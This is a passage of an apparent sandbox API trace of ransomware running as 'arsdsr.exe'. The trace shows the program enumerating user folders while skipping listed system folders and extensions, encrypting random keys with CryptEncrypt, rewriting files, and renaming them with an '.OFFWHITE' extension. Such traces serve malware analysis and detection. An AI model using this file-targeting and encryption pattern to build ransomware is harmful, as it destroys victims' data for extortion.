lpString1="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.OFFWHITE") returned="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.OFFWHITE" [0153.250] MoveFileW (lpExistingFileName="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.OFFWHITE" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.offwhite")) returned 1 [0153.251] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8deeffb, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8deeffb, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8ead6dc, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0153.251] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0153.251] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0153.251] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="...") returned 1 [0153.251] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="windows") returned -1 [0153.251] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="$recycle.bin") returned 1 [0153.251] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="rsa") returned -1 [0153.251] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="ntuser.dat") returned 1 [0153.251] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="programdata") returned -1 [0153.251] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="appdata") returned 1 [0153.251] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="program files") returned -1 [0153.251] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="program files (x86)") returned -1 [0153.251] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.251] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0153.251] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.251] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.251] PathFindExtensionW (pszPath="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0153.251] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".exe") returned 1 [0153.251] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".log") returned 1 [0153.251] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".cab") returned 1 [0153.251] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".cmd") returned 1 [0153.251] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".com") returned 1 [0153.252] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".cpl") returned 1 [0153.252] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".ini") returned 1 [0153.252] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".dll") returned 1 [0153.252] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".url") returned -1 [0153.252] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".ttf") returned -1 [0153.252] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".mp3") returned 1 [0153.252] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".pif") returned 1 [0153.252] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".mp4") returned 1 [0153.252] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".OFFWHITE") returned 1 [0153.252] lstrcmpiW (lpString1=".regtrans-ms", lpString2=".msi") returned 1 [0153.252] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0153.252] GetProcessHeap () returned 0x500000 [0153.252] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x543e48 [0153.252] CreateFileW (lpFileName="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0153.252] GetFileSizeEx (in: hFile=0x220, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=524288) returned 1 [0153.253] GetProcessHeap () returned 0x500000 [0153.253] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b80 [0153.253] GetProcessHeap () returned 0x500000 [0153.253] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x543b68 [0153.253] GetProcessHeap () returned 0x500000 [0153.253] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565f98 [0153.253] GetProcessHeap () returned 0x500000 [0153.253] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x565e90 [0153.253] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.253] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.253] SystemFunction036 (in: RandomBuffer=0x543b80, RandomBufferLength=0x10 | out: RandomBuffer=0x543b80) returned 1 [0153.253] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.253] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.253] SystemFunction036 (in: RandomBuffer=0x543b68, RandomBufferLength=0x10 | out: RandomBuffer=0x543b68) returned 1 [0153.253] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.253] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.253] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565f98*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x565f98*, pdwDataLen=0x295e990*=0x100) returned 1 [0153.253] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.253] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.253] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x565e90*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x565e90*, pdwDataLen=0x295e98c*=0x100) returned 1 [0153.254] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x80000, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.254] SetLastError (dwErrCode=0x0) [0153.254] WriteFile (in: hFile=0x220, lpBuffer=0x565f98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x565f98*, lpNumberOfBytesWritten=0x295ebcc*=0x100, lpOverlapped=0x0) returned 1 [0153.255] GetLastError () returned 0x0 [0153.255] GetLastError () returned 0x0 [0153.255] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x80100, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.255] WriteFile (in: hFile=0x220, lpBuffer=0x565e90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x565e90*, lpNumberOfBytesWritten=0x295ebcc*=0x100, lpOverlapped=0x0) returned 1 [0153.255] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x80200, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.255] WriteFile (in: hFile=0x220, lpBuffer=0x543e48*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x543e48*, lpNumberOfBytesWritten=0x295ebcc*=0x8, lpOverlapped=0x0) returned 1 [0153.255] GetProcessHeap () returned 0x500000 [0153.255] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x80000) returned 0x2a60020 [0153.256] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.256] ReadFile (in: hFile=0x220, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x295ebc0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295ebc0*=0x80000, lpOverlapped=0x0) returned 1 [0153.321] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0153.322] WriteFile (in: hFile=0x220, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295ebcc*=0x80000, lpOverlapped=0x0) returned 1 [0153.323] GetProcessHeap () returned 0x500000 [0153.324] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0153.327] CloseHandle (hObject=0x220) returned 1 [0153.327] GetProcessHeap () returned 0x500000 [0153.327] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565f98 | out: hHeap=0x500000) returned 1 [0153.327] GetProcessHeap () returned 0x500000 [0153.327] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x565e90 | out: hHeap=0x500000) returned 1 [0153.327] GetProcessHeap () returned 0x500000 [0153.327] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b80 | out: hHeap=0x500000) returned 1 [0153.328] GetProcessHeap () returned 0x500000 [0153.328] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x543b68 | out: hHeap=0x500000) returned 1 [0153.328] lstrcpyW (in: lpString1=0x295e9b8, lpString2="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0153.328] lstrcatW (in: lpString1="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.OFFWHITE") returned="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.OFFWHITE" [0153.328] MoveFileW (lpExistingFileName="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="C:/Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.OFFWHITE" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.offwhite")) returned 1 [0153.329] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0153.329] lstrcmpiW (lpString1="ntuser.ini", lpString2=".") returned 1 [0153.329] lstrcmpiW (lpString1="ntuser.ini", lpString2="..") returned 1 [0153.329] lstrcmpiW (lpString1="ntuser.ini", lpString2="...") returned 1 [0153.329] lstrcmpiW (lpString1="ntuser.ini", lpString2="windows") returned -1 [0153.329] lstrcmpiW (lpString1="ntuser.ini", lpString2="$recycle.bin") returned 1 [0153.329] lstrcmpiW (lpString1="ntuser.ini", lpString2="rsa") returned -1 [0153.329] lstrcmpiW (lpString1="ntuser.ini", lpString2="ntuser.dat") returned 1 [0153.329] lstrcmpiW (lpString1="ntuser.ini", lpString2="programdata") returned -1 [0153.329] lstrcmpiW (lpString1="ntuser.ini", lpString2="appdata") returned 1 [0153.329] lstrcmpiW (lpString1="ntuser.ini", lpString2="program files") returned -1 [0153.329] lstrcmpiW (lpString1="ntuser.ini", lpString2="program files (x86)") returned -1 [0153.329] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.329] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="ntuser.ini" | out: lpString1="C:/Users\\Default\\ntuser.ini") returned="C:/Users\\Default\\ntuser.ini" [0153.329] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.329] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.329] PathFindExtensionW (pszPath="ntuser.ini") returned=".ini" [0153.329] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0153.329] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0153.329] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0153.329] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0153.329] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0153.329] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0153.329] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0153.329] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0153.330] lstrcmpiW (lpString1="Pictures", lpString2=".") returned 1 [0153.330] lstrcmpiW (lpString1="Pictures", lpString2="..") returned 1 [0153.330] lstrcmpiW (lpString1="Pictures", lpString2="...") returned 1 [0153.330] lstrcmpiW (lpString1="Pictures", lpString2="windows") returned -1 [0153.330] lstrcmpiW (lpString1="Pictures", lpString2="$recycle.bin") returned 1 [0153.330] lstrcmpiW (lpString1="Pictures", lpString2="rsa") returned -1 [0153.330] lstrcmpiW (lpString1="Pictures", lpString2="ntuser.dat") returned 1 [0153.330] lstrcmpiW (lpString1="Pictures", lpString2="programdata") returned -1 [0153.330] lstrcmpiW (lpString1="Pictures", lpString2="appdata") returned 1 [0153.330] lstrcmpiW (lpString1="Pictures", lpString2="program files") returned -1 [0153.330] lstrcmpiW (lpString1="Pictures", lpString2="program files (x86)") returned -1 [0153.330] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.330] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Pictures" | out: lpString1="C:/Users\\Default\\Pictures") returned="C:/Users\\Default\\Pictures" [0153.330] lstrcatW (in: lpString1="C:/Users\\Default\\Pictures", lpString2="\\" | out: lpString1="C:/Users\\Default\\Pictures\\") returned="C:/Users\\Default\\Pictures\\" [0153.330] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\Pictures\\" | out: lpString1="C:/Users\\Default\\Pictures\\") returned="C:/Users\\Default\\Pictures\\" [0153.330] lstrcatW (in: lpString1="C:/Users\\Default\\Pictures\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\Pictures\\*.*") returned="C:/Users\\Default\\Pictures\\*.*" [0153.330] FindFirstFileW (in: lpFileName="C:/Users\\Default\\Pictures\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName=".", cAlternateFileName="")) returned 0x544610 [0153.330] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0153.330] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="..", cAlternateFileName="")) returned 1 [0153.331] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0153.331] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0153.331] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0153.331] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0153.331] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0153.331] lstrcmpiW (lpString1="desktop.ini", lpString2="...") returned 1 [0153.331] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0153.331] lstrcmpiW (lpString1="desktop.ini", lpString2="$recycle.bin") returned 1 [0153.331] lstrcmpiW (lpString1="desktop.ini", lpString2="rsa") returned -1 [0153.331] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0153.331] lstrcmpiW (lpString1="desktop.ini", lpString2="programdata") returned -1 [0153.331] lstrcmpiW (lpString1="desktop.ini", lpString2="appdata") returned 1 [0153.331] lstrcmpiW (lpString1="desktop.ini", lpString2="program files") returned -1 [0153.331] lstrcmpiW (lpString1="desktop.ini", lpString2="program files (x86)") returned -1 [0153.331] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\Default\\Pictures\\" | out: lpString1="C:/Users\\Default\\Pictures\\") returned="C:/Users\\Default\\Pictures\\" [0153.331] lstrcatW (in: lpString1="C:/Users\\Default\\Pictures\\", lpString2="desktop.ini" | out: lpString1="C:/Users\\Default\\Pictures\\desktop.ini") returned="C:/Users\\Default\\Pictures\\desktop.ini" [0153.331] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0153.331] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0153.331] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0153.331] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0153.331] lstrcmpiW (lpString1=".ini", lpString2=".log") returned -1 [0153.331] lstrcmpiW (lpString1=".ini", lpString2=".cab") returned 1 [0153.331] lstrcmpiW (lpString1=".ini", lpString2=".cmd") returned 1 [0153.331] lstrcmpiW (lpString1=".ini", lpString2=".com") returned 1 [0153.331] lstrcmpiW (lpString1=".ini", lpString2=".cpl") returned 1 [0153.331] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0153.331] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0153.332] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0153.332] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0153.332] lstrcmpiW (lpString1="PrintHood", lpString2=".") returned 1 [0153.332] lstrcmpiW (lpString1="PrintHood", lpString2="..") returned 1 [0153.332] lstrcmpiW (lpString1="PrintHood", lpString2="...") returned 1 [0153.332] lstrcmpiW (lpString1="PrintHood", lpString2="windows") returned -1 [0153.332] lstrcmpiW (lpString1="PrintHood", lpString2="$recycle.bin") returned 1 [0153.332] lstrcmpiW (lpString1="PrintHood", lpString2="rsa") returned -1 [0153.332] lstrcmpiW (lpString1="PrintHood", lpString2="ntuser.dat") returned 1 [0153.332] lstrcmpiW (lpString1="PrintHood", lpString2="programdata") returned -1 [0153.332] lstrcmpiW (lpString1="PrintHood", lpString2="appdata") returned 1 [0153.332] lstrcmpiW (lpString1="PrintHood", lpString2="program files") returned -1 [0153.332] lstrcmpiW (lpString1="PrintHood", lpString2="program files (x86)") returned -1 [0153.332] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.332] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="PrintHood" | out: lpString1="C:/Users\\Default\\PrintHood") returned="C:/Users\\Default\\PrintHood" [0153.332] lstrcatW (in: lpString1="C:/Users\\Default\\PrintHood", lpString2="\\" | out: lpString1="C:/Users\\Default\\PrintHood\\") returned="C:/Users\\Default\\PrintHood\\" [0153.332] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\Default\\PrintHood\\" | out: lpString1="C:/Users\\Default\\PrintHood\\") returned="C:/Users\\Default\\PrintHood\\" [0153.332] lstrcatW (in: lpString1="C:/Users\\Default\\PrintHood\\", lpString2="*.*" | out: lpString1="C:/Users\\Default\\PrintHood\\*.*") returned="C:/Users\\Default\\PrintHood\\*.*" [0153.332] FindFirstFileW (in: lpFileName="C:/Users\\Default\\PrintHood\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0x295e53c, dwReserved1=0x7f6c43c1, cFileName="desktop.ini", cAlternateFileName="")) returned 0xffffffff [0153.332] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Recent", cAlternateFileName="")) returned 1 [0153.333] lstrcmpiW (lpString1="Recent", lpString2=".") returned 1 [0153.333] lstrcmpiW (lpString1="Recent", lpString2="..") returned 1 [0153.333] lstrcmpiW (lpString1="Recent", lpString2="...") returned 1 [0153.333] lstrcmpiW (lpString1="Recent", lpString2="windows") returned -1 [0153.333] lstrcmpiW (lpString1="Recent", lpString2="$recycle.bin") returned 1 [0153.333] lstrcmpiW (lpString1="Recent", lpString2="rsa") returned -1 [0153.333] lstrcmpiW (lpString1="Recent", lpString2="ntuser.dat") returned 1 [0153.333] lstrcmpiW (lpString1="Recent", lpString2="programdata") returned 1 [0153.333] lstrcmpiW (lpString1="Recent", lpString2="appdata") returned 1 [0153.333] lstrcmpiW (lpString1="Recent", lpString2="program files") returned 1 [0153.333] lstrcmpiW (lpString1="Recent", lpString2="program files (x86)") returned 1 [0153.333] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\Default\\" | out: lpString1="C:/Users\\Default\\") returned="C:/Users\\Default\\" [0153.333] lstrcatW (in: lpString1="C:/Users\\Default\\", lpString2="Recent" | out: lpString1="C:/Users\\Default\\Recent") returned="C:/Users\\Default\\Recent" [0153.333] lstrcatW (in: 